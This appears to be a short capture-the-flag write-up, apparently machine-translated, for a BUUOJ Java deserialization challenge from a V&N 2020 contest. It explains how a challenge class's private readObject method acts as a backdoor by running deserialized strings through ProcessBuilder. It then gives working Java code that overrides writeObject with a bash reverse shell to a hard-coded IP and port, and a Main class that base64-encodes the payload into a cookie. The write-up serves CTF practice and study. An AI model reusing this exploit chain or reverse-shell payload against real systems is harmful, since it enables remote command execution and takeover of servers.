Recurring topic links: https://buuoj.cn/challenges
Reference Links: In 2020 V & N internal assessment Race WriteUp
from a question Getting JAVA deserialization vulnerability
V & N Open 2020 writeup
Java deserialization
Depth understanding of serialization writeObject, readObject, readResolve
In summary, if the target is not a class writeObject or readObject methods defined private, serialization and de-serialization time will call the default method to the target class attribute to serialization and de-serialization, and if the target class defined writeObject or readObject methods private, serialization and de-serialization of the target class will be called when the specified writeObject or readObject methods.
Here's Tools category have readObject,
private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
Object obj = in.readObject();
(new ProcessBuilder((String[])((String[])obj))).start();
}In fact, this is a back door. We can rewrite the Tools class writeObjectto generate payload
private void writeObject(ObjectOutputStream out) throws IOException{
out.writeObject(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/174.0.234.134/11111 0>&1"});
}Generating payload with Main
public class Main {
public static void main(String[] args) {
Tools tools = new Tools();
Base64.Encoder e = Base64.getEncoder();
byte[] var20 = new byte[0];
try {
var20 = Tools.create(tools);
} catch (Exception var15) {
var15.printStackTrace();
}
String cookie = e.encodeToString(var20);
System.out.println(cookie);
}
}